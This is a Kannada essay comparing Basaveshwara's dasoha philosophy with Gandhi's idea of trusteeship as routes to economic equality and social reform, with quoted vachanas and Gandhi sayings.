Bayalu
  • Home
  • About Us
  • Contact Us
Close
Bayalu
Close
  • Home
  • About Us
  • Contact Us
ಬಸವೇಶ್ವರರ ದಾಸೋಹ ತತ್ವ ಮತ್ತು ಗಾಂಧೀಜಿಯ ಧರ್ಮದರ್ಶಿತ್ವ
Share:
Articles December 3, 2018 ಡಿ.ಪಿ. ಪ್ರಕಾಶ್

ಬಸವೇಶ್ವರರ ದಾಸೋಹ ತತ್ವ ಮತ್ತು ಗಾಂಧೀಜಿಯ ಧರ್ಮದರ್ಶಿತ್ವ

ಬೋಧನೆ ಮತ್ತು ಅದನ್ನು ಜಾರಿಗೆ ತರುವ ಕ್ರಿಯೆ ಇವೆರಡನ್ನೂ ನಡೆ- ನುಡಿಗಳ ಸಂಬಂಧದಲ್ಲಿ ಬೆಸೆದು ತಮ್ಮ ಜೀವನವನ್ನೇ ಮನುಕುಲೋದ್ಧಾರದ ಸಿದ್ಧಾಂತಗಳನ್ನಾಗಿ ಬದುಕಿ ತೋರಿಸಿದ ಭಾರತದ ಮಹಾನ್ ಚಿಂತಕರು ಬಸವೇಶ್ವರ ಮತ್ತು ಮಹಾತ್ಮ ಗಾಂಧೀಜಿ. ಯಾವ ಸುದ್ದಿ ಮಾಧ್ಯಮಗಳೂ ಇಲ್ಲದ, ವಿಜ್ಞಾನದ ಬೆಳಕನ್ನು ಕಂಡರಿಯದ, ನಾಡು ಪಟ್ಟಣಗಳನ್ನೇ ರಾಷ್ಟ್ರಗಳೆಂದು ಭಾವಿಸಿ ಆಳ್ವಿಕೆ ನಡೆಸುತ್ತಿದ್ದ, ವರ್ಣ- ವರ್ಗ- ಜಾತಿಗಳ ಹೆಸರಿನಲ್ಲಿ ದುರ್ಬಲರ ಶೋಷಣೆಯಾಗುತ್ತಿದ್ದ ಹನ್ನೆರಡನೆಯ ಶತಮಾನದಲ್ಲಿ ಸರ್ವರ ಏಳ್ಗೆಗೆ ಶ್ರಮಿಸಿದವರು ಬಸವೇಶ್ವರರು. ಆಧುನಿಕತೆಯ ಸೆರಗಿನಲ್ಲಿ, ಕೋಮು ಗಲಭೆಯ ಬೇಗುದಿಯಲ್ಲಿ, ವಸಾಹತುಶಾಹಿಯ ನೆರಳಡಿ ಭಾರತದ ಸಂಪತ್ತು ಕೊಚ್ಚಿ ಹೋಗುತ್ತಿದ್ದ 19-20ನೇ ಶತಮಾನದಲ್ಲಿ ಸಮಾಜ ಸುಧಾರಣೆಗಾಗಿ ಹಗಲಿರುಳು ತಮ್ಮನ್ನೇ ತೇಯ್ದುಕೊಂಡವರು ಗಾಂಧೀಜಿ. ಇಬ್ಬರೂ ಮಾನವತಾವಾದದ ಮೇರು ಶಿಖರಗಳು. ಇವರ ನಡುವೆ ಕಾಲದ, ಪರಿಸರದ,  ಸಂದರ್ಭಗಳ ಅಂತರವಿದ್ದರೂ ಮನುಕುಲಕ್ಕೆ ಅವಿರತವಾಗಿ ದುಡಿದ ಸಾಮ್ಯತೆಯಿದೆ.

ಬಸವೇಶ್ವರರ ಕಾಲದಲ್ಲಿ ಧರ್ಮವೇ ಎಲ್ಲದರ ಕೇಂದ್ರ ಬಿಂದು.  ವ್ಯಕ್ತಿಯ ಚಟುವಟಿಕೆಗಳ ಒಟ್ಟು ಮೊತ್ತವೇ ಆಗಲಿ, ರಾಜನ ಕಾರ್ಯವೈಖರಿಯಾಗಲಿ, ಮತ್ತಾವುದೇ ಕ್ರಿಯೆಯಾಗಿರಲಿ, ಎಲ್ಲದರಲ್ಲೂ ಧರ್ಮವೇ ಕೇಂದ್ರ. ಸಹಸ್ರಾರು ವರ್ಷಗಳಿಂದ ಶೋಷಣೆಗೊಳಗಾಗಿದ್ದ ದೀನದಲಿತರ ಸಂಜೆಗಣ್ಣಿನಾಳದಲ್ಲಿ ಹುದುಗಿದ್ದ ನೋವಿನ ಮಡುವಿನ ನೀರವತೆ ಮತ್ತು ಸ್ತಬ್ದತೆಯ ಪ್ರಚಂಡ ಪ್ರತಿಫಲನದಂತೆಯೇ ಅಂದಿನ ಸಮಾಜದ ಸ್ಥಿತಿಯೂ ಇತ್ತು.  ಧರ್ಮದ ಹೆಸರಲ್ಲಿ ನಡೆಯುತ್ತಿದ್ದ ಅನಾಚಾರಗಳ ಒಟ್ಟು ಮೊತ್ತದ ಫಲ ಇದಾಗಿತ್ತು. ಈ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಮನುಷ್ಯನ ಸರ್ವತೋಮುಖ ಅಭಿವೃದ್ಧಿಗೆ – ಸಮಾಜದ ಉನ್ನತಿಗೆ ಧರ್ಮವೇ ಅಡಿಗಲ್ಲೆಂಬುದನ್ನು ಬಸವೇಶ್ವರರು ಕಂಡುಕೊಂಡರು.  ಧಾರ್ಮಿಕ ವಲಯದಲ್ಲಿ ಹಾಸಿ ಹೊಕ್ಕಾಗಿರುವ ಶೋಷಣೆ ತೊಡೆದು ಹಾಕಿದಲ್ಲಿ ಇತರ ವಲಯಗಳಲ್ಲಿನ ಸುಧಾರಣೆ ತಾನೇತಾನಾಗಿ ಆಗುತ್ತದೆಂಬುದು ಅವರ ನಂಬಿಕೆಯಾಗಿತ್ತು. ಈ ಅರಿವಿನಿಂದಾಗಿಯೇ ಕಲ್ಯಾಣಕ್ರಾಂತಿಯ ಅಡಿಗಲ್ಲು ಮತ್ತು ಮುಕುಟ ಧರ್ಮವೇ ಆಯಿತು. ಸಾಹಿತ್ಯ, ಸಾಮಾಜಿಕ, ಆರ್ಥಿಕ, ರಾಜಕೀಯ ಹೊಲಗಳನ್ನು ಹಸನುಗೊಳಿಸಿ ಉತ್ತಿ- ಬಿತ್ತುವಲ್ಲಿ ಅವರಿಗೆ ಧರ್ಮವೇ ಮೇಟಿಗೂಟವಾಯಿತು. ಬಸವೇಶ್ವರರ ನಂತರ ಮೇಲ್ವರ್ಗದವರ ಶೋಷಣೆಗೆ ಮತ್ತೆ ಒಳಗಾದ ದುರ್ಬಲರು ಶೋಷಿತವರ್ಗವಾಗಿ ತೊಡರುತ್ತಾ ಹತ್ತೊಂಬತ್ತನೇ ಶತಮಾನಕ್ಕೆ ಕಾಲಿಡುವ ಹೊತ್ತಿಗೆ ಮತ್ತೊಬ್ಬ ಪ್ರಬಲ ಸಮಾಜ ಸುಧಾರಕ ಎದುರಾದ. ಅವರೇ ಮಹಾತ್ಮ ಗಾಂಧಿ.

ಗಾಂಧೀಜಿಯ ಸಮಾಜ ಸುಧಾರಕನ ಬದುಕು ಹರವಿ ನಿಂತಿದ್ದು 20ನೇ ಶತಮಾನದ ಮೊದಲ ಭಾಗದಲ್ಲಿ. ಈ ನಡುವೆ ಶತಮಾನಗಳೇ ಉರುಳಿ ಹೋಗಿದ್ದರೂ ಬಡವ-ಶ್ರೀಮಂತರ ನಡುವಿದ್ದದ್ದು ಅಗಾಧ ಅಂತರ. ಆಗಿನಂತೆ ಮೌಢ್ಯ ಧಾರ್ಮಿಕ ಕಟ್ಟುಪಾಡುಗಳಿಲ್ಲದಿದ್ದರೂ ದೀನದಲಿತರದ್ದು ಮಾತ್ರ ಅದೇ ದುಃಸ್ಥಿತಿ. ನವಯುಗದ ಪಾಳೆಗಾರಿಕೆಯ ಜೊತೆ ಪರಕೀಯರ ಕೈಯಡಿ ದಾಸ್ಯ ಜೀವನ. ಸ್ವಾತಂತ್ರ್ಯದ ಹೊಂಬೆಳಕಿಲ್ಲದ ಹಂಗಿನ ಬದುಕು. ಗಾಂಧೀಜಿಯ ಕಾಲದ ಸಾಮಾಜಿಕ ದುಃಸ್ಥಿತಿಗೆ ಇವೆಲ್ಲವೂ ಸಂಕೀರ್ಣತೆಯನ್ನು ತಂದೊಡ್ಡಿದ್ದವು. 12ನೇ ಶತಮಾನದಲ್ಲಿದ್ದಂತೆ ಧರ್ಮ ಅಷ್ಟೊಂದು ಮೇಲುಗೈ ಪಡೆಯದಿದ್ದರೂ ಪ್ರಾಧಾನ್ಯತೆ ಕಳೆದುಕೊಂಡಿರಲಿಲ್ಲ. ಗಾಂಧೀಜಿ ಕೂಡ ತಮ್ಮ ಹೋರಾಟಕ್ಕೆ ಸ್ಪೂರ್ತಿ ಚೈತನ್ಯವನ್ನು ಧರ್ಮದ ನಿಜಾರ್ಥದಲ್ಲಿಯೇ ಕಂಡುಕೊಳ್ಳುತ್ತಾರೆ. ಅವರದು ಯಾವುದೇ ಜಾತಿಗಳಿಗಂಟದ ಮಾನವತೆಯ ಧರ್ಮ. ಹೀಗಾಗಿ ಅವರ ಚಳವಳಿಗೊಂದು ಹೊಸ ಸ್ಪರ್ಶ ಸಿಗುತ್ತದೆ. ಸಮಾಜ ಸುಧಾರಣೆ- ರಾಷ್ಟ್ರ ಸ್ವಾತಂತ್ರ್ಯದ ಹೋರಾಟದ ಕ್ರಾಂತಿಯ ಪಂಜನ್ನು ಸಮಾನತೆ, ಮಾನವೀಯತೆ, ಸತ್ಯ ಮತ್ತು ಸಹಿಷ್ಣುತೆ ಕಿಡಿಗಳಿಂದ ಹೊತ್ತಿಸಿಕೊಳ್ಳುತ್ತಾರೆ.

ಗಾಂಧೀಜಿಯ ಚಳವಳಿಯಲ್ಲಿ ರಾಜಕೀಯ ಕ್ರಾಂತಿಯೇ ಪ್ರಮುಖವಾಗಿದ್ದರೂ ದೀನದಲಿತರ ಉನ್ನತಿ- ಧರ್ಮ ಸಹಿಷ್ಣುತೆ ಮೇಳೈಸಿದ್ದವು. ಸಾಮಾನ್ಯರಲ್ಲಿ ಅತಿಸಾಮಾನ್ಯನ ಆತ್ಮೋದ್ಧಾರ ಬಯಸಿದ ಗಾಂಧೀಜಿ, ದುರ್ಬಲರ ಒಟ್ಟಾರೆ ದನಿಯಾಗಿದ್ದರು. ಸಾಮಾಜಿಕ- ಆರ್ಥಿಕ ಅಸಮಾನತೆಯನ್ನು ಕಂಡಿದ್ದ ಅವರ ಮನದಲ್ಲಿ ದಾಸ್ಯ ನಿರ್ಮೂಲನಕ್ಕೆ ರಾಜಕೀಯ ಕ್ರಾಂತಿ ಎಷ್ಟರಮಟ್ಟಿಗೆ ಅವಶ್ಯವೋ ಹಾಗೇ ಒಂದು ಸಮಗ್ರ ಪರ್ಯಾಯ ವ್ಯವಸ್ಥೆಯ ನಿರ್ಮಾಣಕ್ಕೆ ಅದು ಅಷ್ಟೇ ಅವಶ್ಯ ಎಂಬ ನಂಬಿಕೆ ಇತ್ತು. ಈ ಕಾರಣದಿಂದಲೇ ಮಧ್ಯಯುಗೀನ ಪಾಳೆಗಾರಿಕೆಯ ಉತ್ತರೋತ್ತರದಲ್ಲಿ ಹುಟ್ಟಿಕೊಂಡ ಆಧುನಿಕ ರಾಜಕೀಯದ ಗುಣವರ್ತುಲದ ಛಾಪನ್ನು ಗಾಂಧೀಜಿಯ ನಿಲುವಿನಲ್ಲಿ ಕಾಣಬಹುದು. ಆದರೆ ಧರ್ಮ ಮನುಷ್ಯನ ಎಲ್ಲಾ ಚಟುವಟಿಕೆಗಳಲ್ಲೂ ಹಾಸು ಹೊಕ್ಕಾಗಿರುವುದನ್ನು ಬಸವೇಶ್ವರರು ಅರಿತಿದ್ದರು. ಶೋಷಣೆಗೊಳಗಾದ ಸಮಾಜವನ್ನು ಮುರಿದು ಪ್ರಗತಿಪರ ಸಮಾಜ ಕಟ್ಟಬೇಕಾದರೆ ಪ್ರಸ್ತುತ ಸಮಾಜವನ್ನು ಬಿಚ್ಚಿ ಪರೀಕ್ಷಿಸಲು (oveಡಿhಚಿuಟiಟಿg) ಧರ್ಮವೇ ಸಾಧನವೆಂಬುದನ್ನು ಅವರ ಸೂಕ್ಷ್ಮಮತಿ ತೀರ್ಮಾನಿಸಿತ್ತು. ಈ ಕಾರಣದಿಂದಲೇ ಬಸವೇಶ್ವರರ ಕಲ್ಯಾಣ ಕ್ರಾಂತಿ ಎಲ್ಲಾ ವಲಯಗಳನ್ನೂ ಆವರಿಸಿತ್ತು.

ಈ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಇತಿಹಾಸದ ಈ ಎರಡು ಪ್ರಮುಖ ಚಳವಳಿಗಳಲ್ಲಿ ಆರ್ಥಿಕ ಸಮಾನತೆ ಸಾಧಿಸಲು ನೆರವಾದ ಬಹುಮುಖ್ಯ ಸಿದ್ಧಾಂತಗಳೆಂದರೆ ಬಸವೇಶ್ವರರ ದಾಸೋಹ ತತ್ವ ಮತ್ತು ಗಾಂಧೀಜಿಯ ಧರ್ಮದರ್ಶಿತ್ವ.

ತತ್ವದ ಬುನಾದಿ

ವಸಾಹತುಶಾಹಿಯ ಕರಿನೆರಳಡಿ ಅಸ್ತಿತ್ವಶೂನ್ಯರಂತಿರುವ ಸಾಮಾನ್ಯರನ್ನು, ಬಂಡವಾಳಶಾಹಿ ಹಾಗೂ ಜಮೀನ್ದಾರರ ಶೋಷಣೆಗೊಳಗಾಗಿದ್ದ ಶ್ರಮಿಕ ವರ್ಗದ ಕಷ್ಟಗಳನ್ನು ಗಾಂಧೀಜಿ ಹತ್ತಿರದಿಂದ ಬಲ್ಲವರಾಗಿದ್ದರು. ಆರ್ಥಿಕ ಅಸಮಾನತೆಯನ್ನು ಕಂಡು ಅವರು ಹೇಳುತ್ತಾರೆ: “ನನಗೆಷ್ಟು ಬೇಕು ಅಷ್ಟನ್ನು ತೆಗೆದುಕೊಳ್ಳದೇ ಹೆಚ್ಚು ಶೇಖರಿಸಿದರೆ ಅದನ್ನು ನಾನು ಬೇರೊಬ್ಬರಿಂದ ಕದ್ದಂತಾಯಿತು. ನಮ್ಮ ಇರುವಿಕೆಗೆ ದಿನನಿತ್ಯ ಸಾಕಾಗುವಷ್ಟನ್ನು ನಿಸರ್ಗ ದಯಪಾಲಿಸುತ್ತದೆ. ಇದು ಪ್ರಕೃತಿಯ ನಿಯಮ.  ಆದ್ದರಿಂದ ಪ್ರತಿಯೊಬ್ಬರು ತಮಗೆಷ್ಟು ಬೇಕೋ ಅಷ್ಟನ್ನು ಮಾತ್ರ ಉಪಯೋಗಿಸಿದಲ್ಲಿ ಈ ಜಗತ್ತಿನಲ್ಲಿ ಯಾರೂ ಬಡವರಾಗಿರುವುದಿಲ್ಲ. ಯಾರೂ ಹಸಿವಿನಿಂದ ಸಾಯಬೇಕಾಗಿಲ್ಲ…”

ಸಮಾಜದ ಹೀನಾವಸ್ಥೆಗೆ ಪುರೋಹಿತ ವರ್ಗವು ಧರ್ಮದ ಹೆಸರಿನಲ್ಲಿ ನಡೆಸುತ್ತಿರುವ ಅನಾಚಾರಗಳೇ ಕಾರಣ ಎಂಬುದು ಬಸವೇಶ್ವರರಿಗೆ ಮನದಟ್ಟಾಗಿತ್ತು. ಶೋಷಣೆ- ಅಸಮಾನತೆ ತುಂಬಿಕೊಂಡಿದ್ದ ಧರ್ಮದಿಂದ ಸಮಾಜದ ಉನ್ನತಿ ಸಾಧ್ಯವಿಲ್ಲವೆಂದು, ಆಧ್ಯಾತ್ಮ- ಧರ್ಮ- ಕಾಯಕ- ದಾಸೋಹ ಚತುರ್ವೇಣಿ ಸಂಗಮದ ಹೊಸ ಭಕ್ತಿಪಥವನ್ನೇ ನಿರ್ಮಿಸುತ್ತಾರೆ. ಇದರ ಮೂಲಕ ಸರ್ವಯೋಗ ಸಮನ್ವಯವನ್ನೂ, ಪಾರಮಾರ್ಥಿಕ-ಲೌಕಿಕಗಳ ಸಾಮರಸ್ಯವನ್ನೂ ಮತ್ತು ಸಮಾಜದ ಅಭ್ಯುದಯವನ್ನೂ ಸಾಧಿಸಿ ತೋರಿಸುತ್ತಾರೆ.

ಅಸಮಾನತೆಗೆ ಆರ್ಥಿಕ, ಧಾರ್ಮಿಕ, ರಾಜಕೀಯ ವಲಯಗಳು ಕಾರಣವಾಗಿದ್ದರೂ ಧರ್ಮವೇ ಪ್ರಧಾನವಾದ್ದರಿಂದ ಈ ತಾರತಮ್ಯವನ್ನು ಹೋಗಲಾಡಿಸಲು ಧಾರ್ಮಿಕ ವಲಯ ಬಿಟ್ಟು ಪ್ರತ್ಯೇಕವಾಗಿ ಕಾರ್ಯೋನ್ಮುಖವಾದರೆ ಸಿದ್ಧಿ ಲಭಿಸದೆಂಬ ಸತ್ಯ ಬಸವೇಶ್ವರರ ಕುಶಾಗ್ರಮತಿಗೆ ತಿಳಿದಿತ್ತು. ಆದ್ದರಿಂದಲೇ ಅವರ ದಾಸೋಹ ತತ್ವ (ಅಂದರೆ ಗುರುಲಿಂಗ ಜಂಗಮ ಎಂಬ ತ್ರಿವಿಧಕ್ಕೆ ದಾಸನು ಎಂಬ ಭಾವನೆ) ಕೇವಲ ಹಣಕಾಸು ವ್ಯವಹಾರ ಅಥವಾ ಗಳಿಕೆ – ಉಳಿಕೆಗಳ ಸಮೀಕರಣಗಳಲ್ಲಿ ಸೀಮಿತವಾಗದೇ ವ್ಯಕ್ತಿಯ ಸರ್ವಗುಣಗಳ ಮೇಲೆ ಹತೋಟಿ ಸಾಧಿಸುವ, ಈ ಮೂಲಕ ಸಮಾಜದ ಸರ್ವಾಂಗೀಣ ಬೆಳವಣಿಗೆ ನಿರ್ಧರಿಸುವ ಒಂದು ಮುಖ್ಯ ತತ್ವವಾಗಿದೆ. ದಾಸೋಹ ದಾನವಲ್ಲ. ದಾಸ್ಯಭಾವ ಬಿಂಬಿಸುವ ಪದವೂ ಅಲ್ಲ. ನಿರಾಕಾರ ದೇವನ ವಿರಾಟ ಶಕ್ತಿಯ ಸಾಕಾರರೂಪವಾದ ಸಮಾಜಕ್ಕೆ ಸಮರ್ಪಣೆಯಾಗುವುದನ್ನು ಸೂಚಿಸುತ್ತದೆ. ಮಾನವಕುಲದ ಉನ್ನತಿಯ ಮೂಲ ತತ್ವ ಇದು.

ಅನರ್ಥಗಳಿಗೆ ಆಸೆಯೇ ಮೂಲವೆಂದರಿತ ಬಸವೇಶ್ವರರು ಅದನ್ನು ಅಳಿಯುವುದೇ ದಾಸೋಹದ ಮೊದಲ ಹೆಜ್ಜೆ ಎನ್ನುತ್ತಾರೆ. “ಆಸೆಗೆ ಹುಟ್ಟಿದ ಪ್ರಾಣಿ ಆಸೆಯನು ಕಲಿತು ಪುಣ್ಯದ ಪದವಿಯ ಬಯಸಿದೆಡೆ ಭವಮಾಲೆಯ ಬರವು ತಪ್ಪದು, ಆಸೆ ಬಿಡದನ್ನಕ್ಕ ಭಕ್ತನೆಂತಪ್ಪನಯ್ಯ…” ಎಂಬಲ್ಲಿ ಆಸೆ ಅಳಿಸುವತ್ತ ಗಮನ ಕೊಡುತ್ತಾರೆ. ಹೊಟ್ಟೆಬಾಕತನವೇ ಆಸ್ತಿ-ಪಾಸ್ತಿಯ ಕೂಡು ಹಾಕುವಿಕೆಗೆ ಉತ್ತೇಜನ. ಅಂತರಂಗ ಶುದ್ಧಿಯಾದಲ್ಲಿ ಈ ಹೊಟ್ಟೆಬಾಕತನ ನಿರ್ಮೂಲನವಾದಂತೆಯೇ. ಅರಿಷಡ್ವರ್ಗಗಳ ನಾಶದಿಂದ ಮನುಷ್ಯ ನಿಜವಾದ ಶರಣನಾಗುತ್ತಾನೆ.  ಇದರಿಂದ ಅಸಮಾನತೆ, ದುರಾಸೆ, ಶೋಷಣೆಗಳೆಂಬ ರುಜಿನಗಳ ನಿರ್ಮೂಲನೆ ಸಾಧ್ಯ ಎನ್ನುತ್ತಾರೆ ಬಸವೇಶ್ವರರು.

ಗಾಂಧೀಜಿ ಹೇಳುತ್ತಾರೆ: “ಒಂದು ಅಚ್ಚುಕಟ್ಟಿನ ರಾಷ್ಟ್ರದಲ್ಲಿ ಒಬ್ಬನ ಜೀವನೋಪಾಯವು ಸುಲಭವಾಗಿ ದೊರೆಯುತ್ತದೆ ಮತ್ತು ದೊರೆಯಲೇಬೇಕು. ಆ ರಾಷ್ಟ್ರದ ವ್ಯವಸ್ಥೆಯನ್ನು ಅಲ್ಲಿಯ ಕೋಟ್ಯಾಧಿಪತಿಗಳ ಸಂಖ್ಯೆ ನಿರ್ಧರಿಸುವುದಿಲ್ಲ. ಬದಲಿಗೆ ಅಲ್ಲಿನ ಪ್ರಜೆಗಳಲ್ಲಿ ಎಷ್ಟು ಕಡಿಮೆ ಆಹಾರ ಸಮಸ್ಯೆಯಿದೆ ಎಂಬುದು…” ಅತಿಯಾಸೆ ತ್ಯಜಿಸದಿದ್ದರೆ ಮನುಷ್ಯನ ಕೂಡಿಹಾಕುವ ಕ್ರಿಯೆ ನಡೆಯುತ್ತಲೇ ಇರುತ್ತದೆ. ಈ ಸಾಮಾನ್ಯ ಅಂಶವನ್ನೇ ಗಾಂಧೀಜಿ ಬಲವಾಗಿ ಪ್ರತಿಪಾದಿಸಿ ಆಸೆಯೇ ಎಲ್ಲಾ ಅನರ್ಥಗಳಿಗೆ ಕಾರಣವೆನ್ನುತ್ತಾರೆ.

ಸಕಲ ಜೀವಾತ್ಮಗಳನ್ನು ಸೃಷ್ಟಿಸಿದ ದೇವನೇ ಪಾಲಕ. ಹೀಗಿರುವಾಗ ನಮ್ಮ ವಶದಲ್ಲಿ ಏನನ್ನು ಇಟ್ಟುಕೊಳ್ಳಲು ಸಾಧ್ಯ? “ನೀ ಹುಟ್ಟಿಸಿದಲ್ಲಿ ಹುಟ್ಟಿ ನೀ ಕೊಂದಲ್ಲಿ ಸಾಯದೆ, ಎನ್ನ ವಶವೇ ಅಯ್ಯಾ?”  ಎನ್ನುವ ಬಸವೇಶ್ವರರು ಇಂದಿಗೆ ನಾಳೆಗೆ ಎಂದು ಶೇಖರಿಸುವ ಮನೋಗುಣವೇ ಸಲ್ಲದು ಎನ್ನುತ್ತಾರೆ. “ಲಿಂಗದ ಉಂಡಿಗೆಯ ಪಶುವಾನಯ್ಯ. ವೇಷಧಾರಿಯಾನು, ಉದರಪೋಷಕ ನಾನಯ್ಯಾ, ಕೂಡಲಸಂಗನ ಶರಣರ ಧರ್ಮದ ಕವಿಲೆಯಾನು” ಎನ್ನುವಲ್ಲಿ ಸಮಾಜಕ್ಕೆ, ಧರ್ಮಕ್ಕೆ ಅವರು ಸೂಚಿಸುವ ಸಮರ್ಪಣಾ ಮನೋಭಾವ ಕಾಣಬಹುದು. ಯಾರೇ ಆಗಲಿ ವರ್ಣ- ವರ್ಗ- ಜಾತಿ ಹಾಗೂ ಲಿಂಗ ಬೇಧವಿಲ್ಲದೆ ಎದೆಯ ಮೇಲೆ ಇಷ್ಟಲಿಂಗ ಧರಿಸಿದವ ಶರಣಧರ್ಮಕ್ಕೆ ಸೇರುತ್ತಾನೆ. ಅವನು ಆಕಳುವಿನಂತೆ ಸಕಲರಿಗೂ ಶ್ರೇಯಸ್ಸನ್ನು ಕೊಡುವ ಕೊಡುಗೈಯಾಗಬೇಕು. ಅಷ್ಟೇ ಅಲ್ಲ ಅವನು ಲಿಂಗದ ಉಂಡಿಗೆ (ಮುದ್ರೆ)ಯ ಪಶು.  ಇಷ್ಟಲಿಂಗವನ್ನು ಯಾರು ಬೇಕಾದರೂ ದೀಕ್ಷೆ ಪಡೆದು ಧರಿಸಬಹುದಾದ್ದರಿಂದ ಅದು ಸಮಾನತೆಯ ಸಂಕೇತ. ಇಲ್ಲಿ ಶರಣನ ಅಸ್ತಿತ್ವವು ಸರ್ವರ ಅಸ್ತಿತ್ವದ ಮಹತ್ತಿನಲ್ಲಿ ಲೀನವಾಗಿದೆ. ಇದು ತನ್ನ ಗಳಿಕೆ ಬೇರಲ್ಲ ಸಮಾಜದ ಗಳಿಕೆ ಬೇರಲ್ಲ ಎನ್ನುವ ಭಾವನೆ. ಲಿಂಗ- ಜಂಗಮ ಎರಡನ್ನೂ ಬೇರ್ಪಡಿಸಿ ನೋಡಲಾಗದು. ಅಷ್ಟರಮಟ್ಟಿಗೆ ಬಸವೇಶ್ವರರು ಧರ್ಮ-ದೇವರು ಹಾಗೂ ಸಮಾಜವನ್ನು ಬೆಸೆದಿದ್ದಾರೆ.

ಜಂಗಮ ವಿರಹಿತ ಲಿಂಗಾರ್ಚನೆ ಓಡಬಲಲೆರೆದ ಜಲದಂತೆ.
ಜಂಗಮ ಸನ್ನಿಹಿತ ಲಿಂಗಾರ್ಚನೆ, ಇದೆ ಭಕ್ತಿಗೆ ಪಥವಯ್ಯಾ.
ಜಂಗಮ ಪ್ರಸಾದ ಭೋಗೋಪಭೋಗವು, ಎನಗಿದೇ ಲಿಂಗಾರ್ಚನೆ.
ಬೇರೆ ಮತ್ತೊಂದನರಿದನಾದಡೆ,
ಕೂಡಲ ಸಂಗಮದೇವ ನರಕದಲ್ಲಿಕ್ಕುವ.

ಸಮಾಜವನ್ನಗಲಿದ ಲಿಂಗಾರ್ಚನೆ ಸಲ್ಲದು. ಅದಕ್ಕೆ ಅರ್ಥವೇ ಇಲ್ಲ. ಇದು ಬಸವೇಶ್ವರರು ಸಮಾಜದಲ್ಲಿ ದೇವರನ್ನು ಕಂಡ ಪರಿ. ಭಕ್ತಿಯ ಪಥವೆಂದರೆ ಜಂಗಮವನ್ನರಿತೇ, ಸಮಾಜ ಮುಂದಿಟ್ಟುಕೊಂಡೇ ಮಾಡುವಂತಹ ಲಿಂಗಾರ್ಚನೆ. ಸಮಾಜದ (ಸರ್ವರ) ಸುಖ- ದುಃಖ, ಪ್ರಸಾದ ಎಲ್ಲವೂ ಲಿಂಗಾರ್ಚನೆಯ ಫಲ. ಭಕ್ತಿಯ ರಸದಲ್ಲಿ ಸಮಾಜವನ್ನದ್ದಿ ಅಲ್ಲಿ ದೇವರನ್ನು ಕಂಡ ಬಸವೇಶ್ವರರ ಆಧ್ಯಾತ್ಮಿಕ ದೃಷ್ಟಿ ಜಗತ್ತಿನಲ್ಲಿಯೇ ವಿಶಿಷ್ಟವಾದುದು. ಬಸವೇಶ್ವರರ ಭಕ್ತಿ ಭಂಡಾರ ತುಂಬಿದ್ದು, ಸುರಿದದ್ದು ಎಲ್ಲವೂ ಸಮಾಜದ ಉದ್ಧಾರಕ್ಕಾಗಿಯೇ.

ಸಮಾಜದ ಒಟ್ಟು ಸಂಘಟನೆಯಲ್ಲಿ ಏಳ್ಗೆ ಕಾಣುತ್ತಾ, ಶ್ರಮಿಸುತ್ತಾ, ಆ ಸ್ವವರ್ಧನೆಯನ್ನು ಬಯಸುವ ಕಾಲ ದೂರವಾಗಿದೆ. ಈ ಶತಮಾನವೇಕೆ ಬಸವೇಶ್ವರರು ಬಾಳಿ ಬದುಕಿದ ಕಾಲದಲ್ಲಿಯೇ ಅದು ಇರಲಿಲ್ಲ. ಇಂಥ ಸಂದಿಗ್ಧತೆಯಲ್ಲಿ ಸಮಾಜ ಮತ್ತು ನಿರಾಕಾರ ದೇವರು- ಈ  ಎರಡನ್ನೂ ಬೆಸೆದ ಬಸವೇಶ್ವರರ ಭಕ್ತಿಮಾರ್ಗವು ಇಂದಿನ ಕಾಲಕ್ಕೆ ಅತ್ಯಂತ ಪ್ರಸ್ತುತ. ಸಮಾಜದ, ಮಾನವ ಸಂಕುಲದ ಒಟ್ಟಾರೆ ಸಂಘಟನೆಯಲ್ಲಿ ಚುಳುಕಾಗಿಸಿದ ನಿರಾಕಾರ ದೇವರು ನಮಗೆಷ್ಟು ಸಮೀಪ ಎಂಬುದು ಬಸವೇಶ್ವರರ ಪ್ರಸ್ತುತ ವಚನದಲ್ಲಿ ವೇದ್ಯ: “ಜಂಗಮವೇ ಲಿಂಗವೆನಗೆ, ಜಂಗಮವೇ ಪ್ರಾಣವೆನಗೆ ಕೂಡಲಸಂಗಮದೇವಯ್ಯ.”

ಇಂತಹ ತಾತ್ವಿಕ ನೆಲಗಟ್ಟಿನ ಮೇಲೆ ಬಸವೇಶ್ವರರ ದಾಸೋಹ ತತ್ವ ನಿಂತಿದೆ.  ಅದನ್ನು ವ್ಯಕ್ತಿಯ ಯಾವುದೇ ಚಟುವಟಿಕೆಗಳಿಂದ ಬೇರ್ಪಡಿಸಲಾಗದು.

ತತ್ವ ಬೆಳವಣಿಗೆ:

“ಸರ್ವಸ್ವವೂ ಭಗವಂತನಿಗೆ ಸೇರಿದ್ದು, ಇಲ್ಲಿರುವುದೆಲ್ಲಾ ಅವನಿಂದಲೇ ಬಂದುದು. ಆದ್ದರಿಂದ ಸಮಸ್ತ ಜನರಿಗೂ ಇದೆಲ್ಲ ಸಮವಾಗಿ ಸೇರಬೇಕೇ ವಿನಃ ಒಬ್ಬ ವ್ಯಕ್ತಿಗೆ ಮಾತ್ರ ಸೇರ್ಪಡೆಯಾಗುವುದಲ್ಲ. ಯಾವುದೇ ವ್ಯಕ್ತಿ ತನ್ನ ಪಾಲಿಗೆ ಸಿಗುವುದಕ್ಕಿಂತ ಹೆಚ್ಚಾಗಿ ಹೊಂದಿದ್ದಲ್ಲಿ ಆ ಹೆಚ್ಚಿನ ಭಾಗಕ್ಕೆ ಅವನು ಧರ್ಮದರ್ಶಿಯಾಗಬೇಕು, ದೇವರ ಈ ಜನರಿಗಾಗಿ” ಎಂಬುದು ಗಾಂಧೀಜಿಯ ನಿಲುವು. ಭಗವಂತ ಕೊಟ್ಟ ಸಂಪತ್ತಿನ ಮೇಲೆ ಒಬ್ಬನಿಗೆ ಹೆಚ್ಚಿನ ಹಕ್ಕು ಮತ್ತೊಬ್ಬನಿಗೆ ಕಡಿಮೆ ಎನ್ನುವ ಮಾತೇ ಬರುವುದಿಲ್ಲ. ಹೆಚ್ಚಾಗಿ ಸಂಪಾದಿಸಿದರೂ ಅದಕ್ಕವನು ನೈತಿಕವಾಗಿ ಒಡೆಯನಾಗಲಾರ.

